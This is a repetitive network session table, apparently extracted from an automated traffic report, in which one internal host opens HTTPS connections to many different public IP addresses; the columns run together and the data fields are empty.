                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23737192.168.2.2335410198.234.208.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23738192.168.2.235003694.111.79.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23739192.168.2.233342835.247.37.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23740192.168.2.2347392169.68.76.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23741192.168.2.2353132110.96.219.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23742192.168.2.2347396143.188.34.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23743192.168.2.234876473.106.44.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23744192.168.2.234316854.110.165.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23745192.168.2.2352934103.62.78.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23746192.168.2.2343924128.131.33.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23747192.168.2.235323462.250.149.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23748192.168.2.2335414140.183.32.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23749192.168.2.233606051.80.35.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23750192.168.2.2342630218.234.190.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23751192.168.2.2340086115.148.97.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23752192.168.2.235273867.213.225.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23753192.168.2.2353898115.119.30.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23754192.168.2.2349294207.10.21.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23755192.168.2.2335180219.196.237.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23756192.168.2.2356182148.116.72.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23757192.168.2.2349742161.132.191.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23758192.168.2.2360306173.244.79.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23759192.168.2.2337214177.86.82.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23760192.168.2.2357292205.15.221.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23761192.168.2.234245695.253.124.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23762192.168.2.2358452210.226.132.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23763192.168.2.236041281.63.47.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23764192.168.2.235653834.216.160.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23765192.168.2.234638048.199.243.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23766192.168.2.235201279.112.234.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23767192.168.2.2354368185.93.119.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23768192.168.2.2351504167.168.152.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23769192.168.2.2342148123.223.247.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23770192.168.2.2336902191.69.146.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23771192.168.2.2337478217.186.67.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23772192.168.2.2352774173.117.1.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23773192.168.2.235509413.202.56.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23774192.168.2.23392229.104.37.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23775192.168.2.235197458.223.23.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23776192.168.2.2346500106.179.5.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23777192.168.2.2340624194.182.72.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23778192.168.2.2354616197.174.86.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23779192.168.2.2334490123.57.89.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23780192.168.2.233613812.88.30.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23781192.168.2.233564437.45.142.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23782192.168.2.2354912153.66.212.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23783192.168.2.233974494.245.175.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23784192.168.2.2338214151.128.23.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23785192.168.2.2341574103.132.33.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23786192.168.2.2333682148.246.255.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23787192.168.2.235374413.127.163.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23788192.168.2.2358874140.78.60.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23789192.168.2.2337980143.64.184.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23790192.168.2.235906419.249.197.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23791192.168.2.2351080122.109.123.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23792192.168.2.234549494.171.149.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23793192.168.2.2341216217.205.60.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23794192.168.2.2341716133.70.144.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23795192.168.2.2347036107.101.111.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23796192.168.2.233786289.60.68.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23797192.168.2.234540834.50.237.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23798192.168.2.2332860118.11.177.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23799192.168.2.2334168169.31.63.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23800192.168.2.2345118122.206.41.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23801192.168.2.2359548217.164.188.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23802192.168.2.234115413.240.247.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23803192.168.2.234328434.156.148.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23804192.168.2.2352698170.192.215.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23805192.168.2.234561050.113.170.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23806192.168.2.2334574103.182.177.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23807192.168.2.2357788204.220.80.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23808192.168.2.2359784175.10.6.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23809192.168.2.2351790208.171.213.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23810192.168.2.234434814.134.219.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23811192.168.2.2354010185.216.116.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23812192.168.2.2338114165.24.175.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23813192.168.2.2354932119.115.119.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23814192.168.2.2336378163.200.49.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23815192.168.2.2337482178.147.136.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23816192.168.2.2346406163.76.56.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23817192.168.2.2357566104.176.130.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23818192.168.2.2338652115.183.98.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23819192.168.2.2341312131.43.180.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23820192.168.2.2354328166.228.25.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23821192.168.2.2360380182.32.41.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23822192.168.2.2348526151.52.97.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23823192.168.2.234512053.196.247.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23824192.168.2.2339260172.193.38.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23825192.168.2.2351738113.14.107.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23826192.168.2.2340532155.100.214.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23827192.168.2.2358486219.125.129.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23828192.168.2.2360404149.69.171.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23829192.168.2.2340878194.109.217.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23830192.168.2.2357836121.154.145.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23831192.168.2.2336150182.214.185.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23832192.168.2.2360472123.229.89.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23833192.168.2.2353826189.52.96.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23834192.168.2.2334626169.81.210.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23835192.168.2.233983639.88.15.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23836192.168.2.2348892120.79.149.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23837192.168.2.2355882156.3.74.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23838192.168.2.2335058178.232.199.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23839192.168.2.2334290184.225.217.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23840192.168.2.2341434153.253.54.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23841192.168.2.2345692114.139.175.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23842192.168.2.234741459.185.124.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23843192.168.2.234068612.208.148.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23844192.168.2.2346620131.191.197.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23845192.168.2.2336840190.169.11.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23846192.168.2.2357774177.50.98.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23847192.168.2.235704031.37.38.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23848192.168.2.2356912108.105.81.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23849192.168.2.2339808113.79.131.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23850192.168.2.2350356190.189.229.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23851192.168.2.235040264.82.117.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23852192.168.2.234422497.170.81.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23853192.168.2.2335170205.120.56.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23854192.168.2.2340464190.238.248.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23855192.168.2.2351326188.45.232.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23856192.168.2.2349534120.229.86.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23857192.168.2.233709868.18.246.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23858192.168.2.2345914222.170.42.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23859192.168.2.235809241.54.63.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23860192.168.2.2350860163.34.145.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23861192.168.2.234255440.148.224.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23862192.168.2.2351676128.169.178.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23863192.168.2.234692469.112.200.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23864192.168.2.2337866161.253.84.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23865192.168.2.235673089.223.173.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23866192.168.2.234982083.55.81.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23867192.168.2.2345608190.238.29.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23868192.168.2.2349598149.105.140.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23869192.168.2.234821282.247.74.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23870192.168.2.2354646135.218.38.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23871192.168.2.2348600221.108.58.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23872192.168.2.2359740128.0.17.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23873192.168.2.234146499.246.29.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23874192.168.2.2348418109.196.146.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23875192.168.2.2333922217.125.22.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23876192.168.2.2333388116.202.244.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23877192.168.2.2335308170.37.86.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23878192.168.2.2351216103.102.40.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23879192.168.2.2333300103.65.153.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23880192.168.2.234278265.204.177.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23881192.168.2.2341086220.187.229.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23882192.168.2.2334406128.186.81.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23883192.168.2.23377105.182.118.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23884192.168.2.2360940209.101.8.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23885192.168.2.2360402169.213.206.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23886192.168.2.234784897.225.201.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23887192.168.2.2346370196.216.26.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23888192.168.2.2353260164.24.75.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23889192.168.2.2354060211.234.195.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23890192.168.2.234087624.36.141.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23891192.168.2.234597858.148.143.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23892192.168.2.235868098.184.72.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23893192.168.2.2346146128.129.23.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23894192.168.2.2349308191.2.142.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23895192.168.2.2345638140.111.235.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23896192.168.2.2344384150.128.91.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23897192.168.2.233934883.10.151.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23898192.168.2.234647462.118.61.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23899192.168.2.2356204153.42.37.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23900192.168.2.2349612155.80.37.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23901192.168.2.2347044194.36.11.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23902192.168.2.2360274161.43.79.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23903192.168.2.234905095.246.31.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23904192.168.2.2348340161.168.191.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23905192.168.2.2350612181.193.69.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23906192.168.2.235599027.116.5.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23907192.168.2.2334306142.127.112.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23908192.168.2.2344994119.196.20.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23909192.168.2.235464232.214.118.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23910192.168.2.233840654.215.23.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23911192.168.2.2334032139.2.103.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23912192.168.2.2347384102.124.169.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23913192.168.2.2344508153.35.25.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23914192.168.2.2333664191.111.247.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23915192.168.2.2360782106.100.37.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23916192.168.2.234570473.117.87.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23917192.168.2.233500058.226.33.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23918192.168.2.236084690.212.215.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23919192.168.2.2349982125.242.149.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23920192.168.2.2357318159.99.0.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23921192.168.2.2337028130.143.115.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23922192.168.2.2338920113.126.125.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23923192.168.2.235181878.136.250.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23924192.168.2.23581064.43.130.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23925192.168.2.2341472212.66.114.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23926192.168.2.2334358116.191.241.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23927192.168.2.2342044140.111.113.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23928192.168.2.2340960168.116.133.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23929192.168.2.235175894.115.46.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23930192.168.2.2344056126.60.91.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23931192.168.2.234816432.188.2.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23932192.168.2.2348100185.89.159.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23933192.168.2.2342940102.61.51.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23934192.168.2.2341042145.140.247.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23935192.168.2.234814020.51.174.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23936192.168.2.2337762107.143.66.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23937192.168.2.2349192170.7.91.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23938192.168.2.234385641.9.203.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23939192.168.2.2338080223.217.80.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23940192.168.2.2356088109.12.21.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23941192.168.2.2333344130.43.36.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23942192.168.2.234130825.113.236.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23943192.168.2.235751646.86.123.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23944192.168.2.2356258199.149.176.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23945192.168.2.2340614203.31.16.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23946192.168.2.233779844.51.160.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23947192.168.2.2349938109.88.205.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23948192.168.2.2353854130.216.194.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23949192.168.2.2350306201.57.164.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23950192.168.2.2347032222.110.25.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23951192.168.2.2356950126.52.26.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23952192.168.2.233890880.236.230.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23953192.168.2.2335750223.51.130.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23954192.168.2.2345048136.175.47.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23955192.168.2.2343688182.93.16.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23956192.168.2.2358684208.245.219.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23957192.168.2.2334668128.245.135.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
